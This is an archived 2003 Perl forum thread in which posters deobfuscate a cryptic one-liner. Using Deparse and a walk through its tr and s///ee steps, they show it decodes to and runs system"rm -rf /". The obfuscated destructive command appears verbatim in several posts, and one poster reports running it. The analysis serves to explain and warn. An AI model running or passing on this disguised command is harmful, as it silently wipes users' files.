Perl tricks

Discussion in 'Perl Misc' started by Andrei Koulik, Sep 25, 2003.

  1. Can anybody explain me how this command deletes files:
    perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/"
    -;;s;;$_;see'
    Andrei Koulik, Sep 25, 2003
    #1
    1. Advertising

  2. In article <bku8sv$63cvq$-berlin.de>,
    Andrei Koulik <> wrote:
    >Can anybody explain me how this command deletes files:
    >perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/"
    >-;;s;;$_;see'



    You can use Deparse to get a clearer view:

    perl -MO=Deparse
    $??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/"-;;s;;$_;see
    ^D

    $?->perl ? s/;s/s;;$?/ : s//=]=>%-{<-|}<&|`{/;
    tr( -/:-@[-`{-})[`-{/"\-];
    s//$_;/see;

    The evil is lurking in the final double eval. Comment that
    line and throw in a 'print' after preceding statements,

    ....
    tr( -/:-@[-`{-})[`-{/"\-]; print;
    #s//$_;/see;

    Ah, the $_ that the double eval loads up with is:

    system"rm--rf-/"

    HTH,
    --
    Charles DeRykus
    Charles DeRykus, Sep 25, 2003
    #2
    1. Advertising

  3. Andrei Koulik wrote:
    >
    > Can anybody explain me how this command deletes files:
    > perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'


    Just change the "s;;$_;see" at the end to "print":

    $ perl -le '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;print'
    system"rm -rf /"


    John
    --
    use Perl;
    program
    fulfillment
    John W. Krahn, Sep 25, 2003
    #3
  4. Andrei Koulik

    David Guest

    Andrei Koulik <> wrote in message news:<bku8sv$63cvq$-berlin.de>...
    > Can anybody explain me how this command deletes files:
    > perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/"
    > -;;s;;$_;see'


    translation:

    $? ?
    s/;s/s;;$?/
    :
    s//=]=>%-{<-|}<&|`{/;

    tr( -/:-@[-`{-})[`-{/"\-];

    s//do{
    $_;
    };/see;

    more translation:

    1. this:

    $? ?
    s/;s/s;;$?/
    :
    s//=]=>%-{<-|}<&|`{/;

    essentially translate to:

    $_ = '=]=>%-{<-|}<&|`{';

    lookup perldoc perlvar to see what $? holds and you will know why.

    2. this:

    tr( -/:-@[-`{-})[`-{/"\-];

    have a few components. those between '(' and ')' are characters to be translated:

    ' -/' means: all characters between the space and '/'
    ':-@' means: all characters between ':' and '@'
    '[-`' means: all characters between '[' and '`'
    '{-}' means: all characters between '{' and '}'

    those between '[' and ']' are characters translated to:

    '`-{' means: all characters between '`' and '{'
    '/" \-' means just the literal characters.

    so you are translating:

    !"#$%&'()*+,-./:;<=>?@[\]^_`{|}
    `abcdefghijklmnopqrstuvwxyz{/" -

    characters from upper string to the lower string.

    now notice what $_ is and plug in the translation gives $_ to be:

    system"rm -rf /"

    3. isn't it clear from now on?

    s//do{
    $_;
    };/see;

    'ee' bascially runs the system call via do{}.

    4. question: are you going to run that to confirm what i said?

    david
    David, Sep 25, 2003
    #4
  5. Andrei Koulik

    Jay Tilton Guest

    Andrei Koulik <> wrote:

    : Can anybody explain me how this command deletes files:
    : perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/"
    : -;;s;;$_;see'

    Start by running it through the Deparse backend to get rid of some
    obfuscating elements, then add some whitespace for readability.

    $? ? s/;s/s;;$?/
    : s//=]=>%-{<-|}<&|`{/ ;

    That puts the string "=]=>%-{<-|}<&|`{" into $_ .

    Beyond extra obfuscation, I don't know what "s/;s/s;;$?/" could have to
    do with anything--I don't know of a circumstance where $? would hold a
    true value when the program starts execution.

    tr ( -/:-@[-`{-})
    [`-{/" \-] ;

    That alters the characters in $_.
    If you print it now, it will read 'system"rm -rf /"' .

    s//do { $_ };/see ;

    That's just a hairy way of saying "eval $_" .

    So were you aware of the code's malicious nature before running it, or
    did something terrible happen?
    Jay Tilton, Sep 25, 2003
    #5
  6. Thank all very much.
    Yesterday I have parsed it manually how John W. Krahn does, but from
    your replies I have learnt some useful things.

    Andrei Koulik wrote:

    > Can anybody explain me how this command deletes files:
    > perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/"
    > -;;s;;$_;see'
    >
    Andrei Koulik, Sep 26, 2003
    #6
  7. Jay Tilton wrote:
    ......
    >
    > So were you aware of the code's malicious nature before running it, or
    > did something terrible happen?
    >

    I was asked to debug script for text formation:

    cat "test... test... test..." | perl -e
    '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'

    but I noted neither -n nor -p option is used so I start debug it on
    behalf of news user (it doesn't own any files).
    But after some steps, lines:
    ....
    rm: /usr/bin/objcopy: Permission denied
    rm: /usr/bin/objdump: Permission denied
    rm: /usr/bin/ranlib: Permission denied
    ....
    were printed. When I pressed ctrl-c the output is froze but beeping is
    started and terminal didn't responsed on any keys.
    I didn't knew what happened and so I had to understood what this program
    actually does to detect possible injuries.
    Andrei Koulik, Sep 26, 2003
    #7
  8. Andrei Koulik

    Jay Tilton Guest

    Andrei Koulik <> wrote:

    : Jay Tilton wrote:
    : .....
    : >
    : > So were you aware of the code's malicious nature before running it, or
    : > did something terrible happen?
    : >
    : I was asked to debug script for text formation:
    :
    : cat "test... test... test..." | perl -e
    : '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'
    :
    : but I noted neither -n nor -p option is used so I start debug it on
    : behalf of news user (it doesn't own any files).
    :
    : But after some steps, lines:
    : ...
    : rm: /usr/bin/objcopy: Permission denied
    : rm: /usr/bin/objdump: Permission denied
    : rm: /usr/bin/ranlib: Permission denied
    : ...
    : were printed. When I pressed ctrl-c the output is froze but beeping is
    : started and terminal didn't responsed on any keys.
    : I didn't knew what happened and so I had to understood what this program
    : actually does to detect possible injuries.

    Next time you feel compelled to run a mysterious script like that, you
    might want to use perl's -T switch, at the least. In this case, it
    would have halted the program with an "Insecure $ENV{PATH}" error before
    any mischief could begin.
    Jay Tilton, Sep 27, 2003
    #8
    1. Advertising

Want to reply to this thread or ask your own question?

It takes just 2 minutes to sign up (and it's free!). Just click the sign up button to choose a username and then you can ask your own questions on the forum.
Similar Threads
  1. Cowboy \(Gregory A. Beamer\)

    Tips and Tricks: Page Templates

    Cowboy \(Gregory A. Beamer\), Dec 3, 2003, in forum: ASP .Net
    Replies:
    2
    Views:
    389
    Colin Young
    Dec 4, 2003
  2. =?Utf-8?B?S2VubmV0aCBQ?=

    Trying localization with Sams Tips&Tricks

    =?Utf-8?B?S2VubmV0aCBQ?=, Nov 15, 2004, in forum: ASP .Net
    Replies:
    3
    Views:
    1,578
    =?Utf-8?B?S2VubmV0aCBQ?=
    Nov 15, 2004
  3. Replies:
    0
    Views:
    408
  4. NOBODY
    Replies:
    0
    Views:
    21,686
    NOBODY
    Mar 7, 2004
  5. Roedy Green

    URLConnection tricks

    Roedy Green, May 4, 2004, in forum: Java
    Replies:
    17
    Views:
    18,413
    Roedy Green
    May 6, 2004
Loading...

Share This Page